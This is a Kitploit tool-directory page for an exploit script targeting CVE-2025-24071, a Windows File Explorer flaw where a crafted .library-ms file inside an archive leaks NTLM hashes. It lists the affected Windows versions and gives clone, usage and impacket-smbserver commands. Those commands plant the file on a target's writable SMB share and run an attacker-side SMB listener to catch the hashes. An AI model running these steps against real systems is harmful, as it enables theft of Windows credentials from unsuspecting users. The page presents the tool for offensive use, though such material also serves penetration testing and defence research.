Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-24071 — Windows File Explorer Spoofing Vulnerability - CVE-2025-24071 | Kitploit
Tools/GitHubGitHub/f4dee-backup/cve-2025-24071
Password CrackingVulnerability AnalysisExploitationData ExfiltrationNetwork Security
GitHubf4dee-backup/cve-2025-24071

CVE-2025-24071

Windows File Explorer Spoofing Vulnerability - CVE-2025-24071

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-24071

Windows File Explorer Spoofing Vulnerability - CVE-2025-24071

Leak the NTLM hash of Windows through the extraction of a manipulated ZIP or RAR file, and by exploiting a vulnerability in the handling of .library-ms files (a type of file used by Windows to specify libraries and network connections).

Affected version

Windows 10 Version 1809 for x64-based Systems Windows 10 Version 1809 for 32-bit Systems Windows Server 2025 (Server Core installation) Windows Server 2025 Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Server 2016 (Server Core installation) Windows Server 2016 Windows 10 Version 1607 for x64-based Systems Windows 10 Version 1607 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 for 32-bit Systems Windows 11 Version 24H2 for x64-based Systems Windows 11 Version 24H2 for ARM64-based Systems Windows Server 2022, 23H2 Edition (Server Core installation) Windows 11 Version 23H2 for x64-based Systems Windows 11 Version 23H2 for ARM64-based Systems Windows 10 Version 22H2 for 32-bit Systems Windows 10 Version 22H2 for ARM64-based Systems Windows 10 Version 22H2 for x64-based Systems Windows 11 Version 22H2 for x64-based Systems Windows 11 Version 22H2 for ARM64-based Systems Windows 10 Version 21H2 for x64-based Systems Windows 10 Version 21H2 for ARM64-based Systems Windows 10 Version 21H2 for 32-bit Systems Windows Server 2022 (Server Core installation) Windows Server 2022 Windows Server 2019 (Server Core installation) Windows Server 2019

Instalation:

root@kitploit:~
git clone https://github.com/f4dee-backup/CVE-2025-24071
root@kitploit:~
cd CVE-2025-24071
root@kitploit:~
chmod +x CVE-2025-24071.sh

Help Panel:

root@kitploit:~
./CVE-2025-24071.sh -h
	-i) Your IP address
	-t) Target IP
	-d) A remote SMB share with write permissions (e.g.) C, ADMIN, IPC, SYSVOL, etc) 
	-u) Username
	-p) Password
	-h) Display this help panel

Usage:

root@kitploit:~
./CVE-2025-24071.sh -i "YOUR_IP" -t "TARGET_IP" -d "DIRECTORY_WRITE_REMOTE" -u "USER" -p "PASSWORD"

Start the SMB server:

root@kitploit:~
impacket-smbserver smbFolder $(pwd) -smb2support
Download Tool